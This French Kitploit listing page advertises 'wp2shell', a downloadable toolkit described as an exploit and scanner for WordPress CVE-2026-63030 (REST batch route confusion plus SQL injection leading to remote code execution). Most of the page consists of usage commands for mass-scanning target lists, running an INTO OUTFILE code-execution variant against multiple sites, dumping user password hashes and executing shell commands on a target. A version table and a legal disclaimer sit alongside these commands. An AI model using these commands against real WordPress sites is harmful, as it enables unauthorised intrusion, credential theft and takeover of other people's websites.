Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
wp2shell — wp2shell - Exploit & Scanner WordPress CVE-2026-63030 | Kitploit
Outils/GitHubGitHub/lutfifakee-project/wp2shell
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - Exploit & Scanner WordPress CVE-2026-63030

Voir le dépôt
61il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔍 wp2shell - Scanner de vulnérabilité et exploit pour WordPress CVE-2026-63030

⚡ Scanner de vulnérabilités et exploit rapide et en temps réel pour CVE-2026-63030 (wp2shell)


📌 Aperçu

wp2shell est une boîte à outils complète pour détecter et exploiter CVE-2026-63030, une vulnérabilité critique dans WordPress qui permet à des attaquants non authentifiés d'exécuter du code à distance via une confusion de routes par lots de l'API REST combinée à une injection SQL.

🔍 Qu'est-ce que CVE-2026-63030 ?

CVE-2026-63030 (wp2shell) est une vulnérabilité critique découverte par Adam Kues (Assetnote / Searchlight Cyber) qui affecte le noyau de WordPress. Elle combine deux bugs :

  1. GHSA-ff9f-jf42-662q - Confusion de routes par lots REST
  2. GHSA-fpp7-x2x2-2mjf - Injection SQL author__not_in

📊 Versions affectées



📦 Clonage et configuration

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ Outils inclus

1️⃣ wp2shell_scanner.py - Scanner rapide

Scanner multi-threadé en temps réel pour la détection de vulnérabilités à grande échelle.

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - Exploit INTO OUTFILE

Démontre la variante RCE INTO OUTFILE (nécessite le privilège FILE de MySQL).

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - Exploit mono-fichier

Version portable et mono-fichier de l'exploit avec toutes les fonctionnalités.

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ Avertissement légal

IMPORTANT : Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.

  • Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
  • L'accès non autorisé à des systèmes informatiques est illégal.
  • Les développeurs déclinent toute responsabilité en cas d'utilisation abusive de ce logiciel. Utilisez-le de manière responsable et éthique.
Télécharger l’outil
Plage de versionsImpactÉtat
6.9.0 - 6.9.4🔴 RCE (Critique)❌ Vulnérable
7.0.0 - 7.0.1🔴 RCE (Critique)❌ Vulnérable
6.8.0 - 6.8.5🟡 SQLi (Élevé)❌ Vulnérable
6.9.5+ / 7.0.2+✅ Corrigé✅ Sûr